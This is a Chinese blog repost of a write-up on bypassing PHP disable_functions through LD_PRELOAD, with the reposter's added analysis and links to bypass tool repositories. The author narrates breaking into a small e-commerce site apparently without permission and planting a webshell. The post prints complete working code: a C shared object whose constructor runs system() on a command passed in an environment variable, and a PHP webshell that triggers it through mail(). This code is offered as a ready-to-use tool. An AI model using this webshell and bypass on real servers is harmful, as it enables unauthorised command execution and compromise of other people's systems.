[轉+自]disable_functions之巧用LD_PRELOAD突破

寫在前面:

經過知乎的一篇艱難的滲透提權，引起了一些對於disable_funcionts繞過的思考，雖然在暑假日記中記載了四種繞過disable_functions，好比com組件,pcntl_exec,LD_PRELOAD,ImageMagick。

此次着重轉載了一篇關於LD_PRELOAD的文章，對LD_PRELOAD繞過disable_functions有了更加深入的理解。但願讀者不要僅在於利用此文章做者的工具直接去應用，若是可以看懂理解的話，會得到很多的知識，對於技術有更深層的理解，而不是直接用工具一步到位。

[轉]無需sendmail：巧用LD_PRELOAD突破disable_functions

摘要：千辛萬苦拿到的 webshell 竟然沒法執行系統命令，懷疑服務端 disable_functions 禁用了命令執行函數，經過環境變量 LD_PRELOAD 劫持系統函數，卻又發現目標根本沒安裝 sendmail，沒法執行命令的 webshell 是無心義的，看我如何突破！

半月前逛「已黑網站列表」時複審一小電商網站，「列表」中並未告知漏洞詳情，簡單瀏覽了下功能，只有註冊、登陸、下單、支付等幾個而已。登陸接口中，找到個 RCE（遠程代碼執行，非遠程命令執行）漏洞：

順勢寫入菜刀馬後鏈接：

習慣上，getshell 後我會先了解下該系統配置，虛擬終端中執行 cat /proc/meminfo 但執行報錯：

懷疑有 WAF 攔劫了待執行的命令，嘗試了空字符串、路徑擴展、自定義變量平時經常使用的幾種繞命令執行限制的手法，結果都失敗：

無命令執行功能的 webshell 是無心義的，得突破！

一般來講，致使 webshell 不能執行命令的緣由大概有三類：一是 php.ini 中用 disable_functions 指示器禁用了 system()、exec() 等等這類命令執行的相關函數；二是 web 進程運行在 rbash 這類受限 shell 環境中；三是 WAF 攔劫。如果一則沒法執行任何命令，如果2、三則能夠執行少許命令。從當前現象來看，極可能由 disable_functions 所致。爲驗證，我利用前面的 RCE 漏洞執行 phpinfo()，確認的確如此：

 

 

 

有四種繞過 disable_functions 的手法：第一種，攻擊後端組件，尋找存在命令注入的、web 應用經常使用的後端組件，如，ImageMagick 的魔圖漏洞、bash 的破殼漏洞；第二種，尋找未禁用的漏網函數，常見的執行命令的函數有 system()、exec()、shell_exec()、passthru()，偏僻的 popen()、proc_open()、pcntl_exec()，逐一嘗試，或許有漏網之魚；第三種，mod_cgi 模式，嘗試修改 .htaccess，調整請求訪問路由，繞過 php.ini 中的任何限制；第四種，利用環境變量 LD_PRELOAD 劫持系統函數，讓外部程序加載惡意 *.so，達到執行系統命令的效果。

嘗試第一種時，我用 phpinfo() 查看 ImageMagick 版本爲 v6.9.4-10：

 

 用 searchsploit（exploit-db.com 的本地版）搜索存在命令注入的版本爲 v6.9.3-9 或 v7.0.1-0：

 

 

顯然，當前 ImageMagick 沒法利用；嘗試第二種時，常見的、不常見的、罕見的（如 dl()），全部可啓動進程的函數均被禁用；嘗試第三種時，發現並未啓用 mod_cgi 模式。全部但願，寄託在 LD_PRELOAD。

設想這樣一種思路：利用漏洞控制 web 啓動新進程 a.bin（即使進程名沒法讓我隨意指定），a.bin 內部調用系統函數 b()，b() 位於系統共享對象 c.so 中，因此係統爲該進程加載共 c.so，我想法在 c.so 前優先加載可控的 c_evil.so，c_evil.so 內含與 b() 同名的惡意函數，因爲 c_evil.so 優先級較高，因此，a.bin 將調用到 c_evil.so 內 b() 而非系統的 c.so 內 b()，同時，c_evil.so 可控，達到執行惡意代碼的目的。基於這一思路，將突破 disable_functions 限制執行操做系統命令這一目標，大體分解成幾步在本地推演：查看進程調用系統函數明細、操做系統環境下劫持系統函數注入代碼、找尋內部啓動新進程的 PHP 函數、PHP 環境下劫持系統函數注入代碼。

查看進程調用系統函數明細。linux 建立新進程的過程較爲複雜，我關心進程加載了哪些共享對象、可能調用哪些 API、實際調用了哪些 API。好比，運行 /usr/bin/id，經過 ldd 可查看系統爲其加載的共享對象：

因爲可執行文件 /usr/bin/id 內含符號表，因此，運行 nm -D /usr/bin/id 2>&1 或 readelf -Ws /usr/bin/id 可查看該程序可能調用的系統 API 明細：

因爲程序運行時會根據命令行選項、運行環境做出不一樣反應，致使真正運行時調用的 API 可能只是 readefl 查看的子集，你能夠運行 strace -f /usr/bin/id 2>&1 跟蹤實際 API 調用狀況，好比，實際調用 open() 的入參、返回值一目瞭然：

操做系統環境下劫持系統函數注入代碼。linux 的環境變量 LD_PRELOAD 是一種相似 win32 API hook 的更優雅的實現，適用於打熱補丁、讀取進程空間數據、禁止程序調用指定 API、調試程序等等場景，甚至能夠在不更改原始可執行文件前提下植入後門（管理員經常使用的 /bin/ps）。因爲被劫持的系統函數得由咱們從新實現一次，函數原型必須一致，爲減小複雜性，我會選擇劫持那些無參數且經常使用的系統函數，getuid() 就適合，以此爲例，完整劫持過程步驟大體以下：首先，用 man 2 getuid 查看函數原型：

而後，編寫同原型的 getuid() 函數，保存至 getuid_shadow.c，源碼爲：

執行 gcc -shared -fPIC getuid_shadow.c -o getuid_shadow.so 將其編譯爲共享對象：

最後，藉助環境變量 LD_PRELOAD 劫持系統函數 getuid()，獲取控制權。執行 LD_PRELOAD=/root/getuid_shadow.so /usr/bin/id，注入代碼成功執行：

注意，LD_PRELOAD 是進程獨佔環境變量，相似於命令適配器，它與待執行命令間必須爲空白字符，而非命令分隔符（;、&&、||）。

找尋內部啓動新進程的 PHP 函數。雖然 LD_PRELOAD 爲我提供了劫持系統函數的能力，但前提是我得控制 php 啓動外部程序才行（只要有進程啓動行爲便可，無所謂是誰）。常見的 system() 啓動程序方式顯然不行，不然就不存在突破 disable_functions 一事了。PHP 腳本中除了調用 system()、exec()、shell_exec() 等等一堆 php 函數外，還有哪一種可能啓動外部程序呢？php 解釋器自身！好比，php 函數 goForward() 實現「前進」的功能，php 函數 goForward() 又由組成 php 解釋器的 C 語言模塊之一的 move.c 實現，C 模塊 move.c 內部又經過調用外部程序 go.bin 實現，那麼，個人 php 腳本中調用了函數 goForward()，勢必啓動外部程序 go.bin。如今，我須要找到相似 goForward() 的真實存在的 PHP 函數。印象中，處理圖片、請求網頁、發送郵件等三類場景中可能存在我想要的函數，我得逐一驗證。處理圖片，一般調用 PHP 封裝的 ImageMagick 庫，新建 image.php，調用 Imagick()：

運行 strace -f php image.php 2>&1 | grep -A2 -B2 execve 查看 Imagick() 是否啓動新進程：

第一個 execve 是啓動 PHP 解釋器而已，必須找到第二個 execve，沒有則說明並未啓動新進程；請求網頁，新建 http.php，調用 curl_init()：

運行 strace -f php http.php 2>&1 | grep -A2 -B2 execve 查看 curl_init() 是否啓動新進程：

仍然不是我要的；發送郵件，新建 mail.php，調用 mail()：

運行 strace -f php mail.php 2>&1 | grep -A2 -B2 execve 查看 mail() 是否啓動新進程：

 

bingo！mail() 內部啓動了 /usr/sbin/sendmail、/usr/sbin/postdrop 兩個新進程，它就是我一直苦尋的函數（用相同的測試方式，還找到一個 imap_mail()）。

PHP 環境下劫持系統函數注入代碼。mail.php 內增長設置 LD_PRELOAD 的代碼：

而後將 mail.php 以及內含 mail() 函數的共享對象 getuid_shadow.so 放入 web 目錄 /var/www/：

執行 mail.php 以後，找到 getuid_shadow.so 中 mail() 建立的文件 /tmp/evil，成功在 PHP 環境下不借助任何 PHP 命令執行函數執行命令：

有了前面的分析，看我如何在目標站點繞過 disable_functions 執行系統命令。

首先，基於前面的 mail.php 寫了個小馬 bypass_disablefunc.php：

 

 bypass_disablefunc.php 提供三個 GET 參數。一是 cmd 參數，待執行的系統命令（如 pwd）；二是 outpath 參數，保存命令執行輸出結果的文件路徑（如 /tmp/xx），便於在頁面上顯示，另外關於該參數，你應注意 web 是否有讀寫權限、web 是否可跨目錄訪問、文件將被覆蓋和刪除等幾點；三是 sopath 參數，指定劫持系統函數的共享對象的絕對路徑（如 /var/www/bypass_disablefunc_x64.so），另外關於該參數，你應注意 web 是否可跨目錄訪問到它。此外，bypass_disablefunc.php 拼接命令和輸出路徑成爲完整的命令行，因此你不用在 cmd 參數中重定向了：

$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";

同時，經過環境變量 EVIL_CMDLINE 向 bypass_disablefunc_x64.so 傳遞具體執行的命令行信息：

putenv("EVIL_CMDLINE=" . $evil_cmdline);

而後，基於 getuid_shadow.c 編寫劫持函數的代碼 bypass_disablefunc.c。回想下，先前我之因此劫持 getuid()，是由於 sendmail 程序會調用該函數，在真實環境中，存在兩方面問題：一是，某些環境中，web 禁止啓用 senmail、甚至系統上根本未安裝 sendmail，也就談不上劫持 getuid()，一般的 www-data 權限又不可能去更改 php.ini 配置、去安裝 sendmail 軟件；二是，即使目標能夠啓用 sendmail，因爲未將主機名（hostname 輸出）添加進 hosts 中，致使每次運行 sendmail 都要耗時半分鐘等待域名解析超時返回，www-data 也沒法將主機名加入 hosts（如，127.0.0.1    lamp、lamp.、lamp.com）。基於這兩個緣由，我不得不放棄劫持函數 getuid()，必須找個更普適的方法。回到 LD_PRELOAD 自己，系統經過它預先加載共享對象，若是能找到一個方式，在加載時就執行代碼，而不用考慮劫持某一系統函數，那我就徹底能夠不依賴 sendmail 了。這種場景與 C++ 的構造函數簡直神似！幾經搜索後瞭解到，GCC 有個 C 語言擴展修飾符 __attribute__((constructor))，可讓由它修飾的函數在 main() 以前執行，若它出如今共享對象中時，那麼一旦共享對象被系統加載，當即將執行 __attribute__((constructor)) 修飾的函數。強調下，這一細節很是重要，不少朋友用 LD_PRELOAD 手法突破 disable_functions 沒法作到百分百成功，正由於這個緣由，咱們不要侷限於僅劫持某一函數，而應考慮劫持共享對象。bypass_disablefunc.c 源碼以下：

從環境變量 EVIL_CMDLINE 中接收 bypass_disablefunc.php 傳遞過來的待執行的命令行。

接着，用命令 gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so 將 bypass_disablefunc.c 編譯爲共享對象 bypass_disablefunc_x64.so：

你要根據目標架構編譯成不一樣版本，在 x64 的環境中編譯，若不帶編譯選項則默認爲 x64，若要編譯成 x86 架構須要加上 -m32 選項。

最後，用菜刀將 bypass_disablefunc.php 和 bypass_disablefunc_x64.so 傳到目標：

 

指定好命令輸出路徑、共享對象路徑後，在 bypass_disablefunc.php 上再次執行先前失敗的命令 cat /proc/meminfo：

啊哈！很酷對不對。

好了，巧用 LD_PRELOAD 突破 disable_functions 的手法就是這樣子，惟一條件，PHP 支持putenv()、mail() 便可，甚至無需安裝 sendmail。那麼，如今的狀況是，我知道你很忙，沒時間看前面的技術細節，要的只是開箱即用的工具。行，bypass_disablefunc.php、bypass_disablefunc.c、bypass_disablefunc_x64.so 託管在 https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD，自取。

分析理解

若是你看了上面的知乎上的滲透文章的話，你會發現做者更新了bypass，不論是原做者的執行失敗仍是淚笑的執行成功，歸根結底都是一樣的原理，而對於不成功的問題，做者也在gayhub中更新了c代碼。

結合php和c我來分析一下

以下:

#define _GNU_SOURCE

#include <stdlib.h>
#include <stdio.h>
#include <string.h>


extern char** environ;

__attribute__ ((__constructor__)) void preload (void)
{
    // get command line options and arg
    const char* cmdline = getenv("EVIL_CMDLINE");

    // unset environment variable LD_PRELOAD.
    // unsetenv("LD_PRELOAD") no effect on some 
    // distribution (e.g., centos), I need crafty trick.
    int i;
    for (i = 0; environ[i]; ++i) {
            if (strstr(environ[i], "LD_PRELOAD")) {
                    environ[i][0] = '\0';
            }
    }

    // executive command
    system(cmdline);
}

解釋道：若是你是一個細心的人你會發現這裏的bypass_disablefunc.c（來自github）和教程中說起的不同，多出了使用for循環修改LD_PRELOAD的首個字符改爲\0，若是你略微瞭解C語言就會知道\0是C語言字符串結束標記，緣由註釋裏有：unsetenv("LD_PRELOAD")在某些Linux發行版不必定生效（如CentOS），這樣一個小動做可以讓系統原有的LD_PRELOAD環境變量自動失效

php源碼

<?php
    echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";
    $cmd = $_GET["cmd"];
    $out_path = $_GET["outpath"];
    $evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
    echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
    putenv("EVIL_CMDLINE=" . $evil_cmdline);
    $so_path = $_GET["sopath"];
    putenv("LD_PRELOAD=" . $so_path);
    mail("", "", "", "");
    echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>"; 
    unlink($out_path);
?>

cmd爲你要執行的命令，outpaht是你想要保存命令的結果的地方,sopath爲共享對象的絕對路徑。

其中

evil_cmdline = $cmd . " > " . $out_path . " 2>&1";

爲你要執行的命令，putenv添加環境變量EVIL_CMDLINE，將命令行賦值給環境變量EVIL_CMDLINE，而後得到劫持函數的共享對象的sopatt路徑，經過調用php mail函數，調用起來新的進程，觸發共享對象中，不須要senmail()劫持系統函數，直接經過__attribute__ ((__constructor__))，在共享對象觸發後，自動調用以下函數:

const char* cmdline = getenv("EVIL_CMDLINE");

獲取環境變量EVIL_CMDLINE即你須要執行的命令，做爲system()函數的參數

system(cmdline) //C 庫函數 int system(const char *command) 把 command 指定的命令名稱或程序名稱傳給要被命令處理器執行的主機環境，並在命令完成後返回。

調用系統命令，執行的你get傳參的系統命令，達到RCE利用。這個繞過很是的有趣，因此特意詳細記錄和分析。但願讀者可以好好通讀文章，得到更全面的理解和知識。

在x64系統中編譯的話，默認是x64，若要編譯成x86須要加上- m32選項

最後總結

通常爲了安全，運維人員會禁用PHP的一些「危險」函數，例如

dl,eval,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link 等

將其寫再php.ini中的disable_functions中

Bypass disable_functions Shell

Bypass涉及禁用函數列表：

dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link

shell繞過已實現的方式:

• 常規繞過: exec、shell_exec、system、passthru、popen、proc_open
• ld_preload繞過: mail、imap_mail、error_log、mb_send_mail
• pcntl_exec
• imap_open
• fastcgi
• com
• apache mod-cgi

目錄結構:

• env - docker環境, 用於測試各種繞過exp
• papar - bypass原理
• exp - bypass腳本

倉庫：https://github.com/l3m0n/Bypass_Disable_functions_Shell

json_反序列化_PHP 7.1-7.3 disable_functions bypass

利用php json序列化漏洞，以繞過disable_functions並執行系統命令

倉庫:https://github.com/mm0r1/exploits/tree/master/php-json-bypass

LD_PRELOA

上述文章中說起的

倉庫：https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

學習文章:

淺談幾種Bypass-disable-functions的方法

淚笑

無需sendmail：巧用LD_PRELOAD突破disable_functions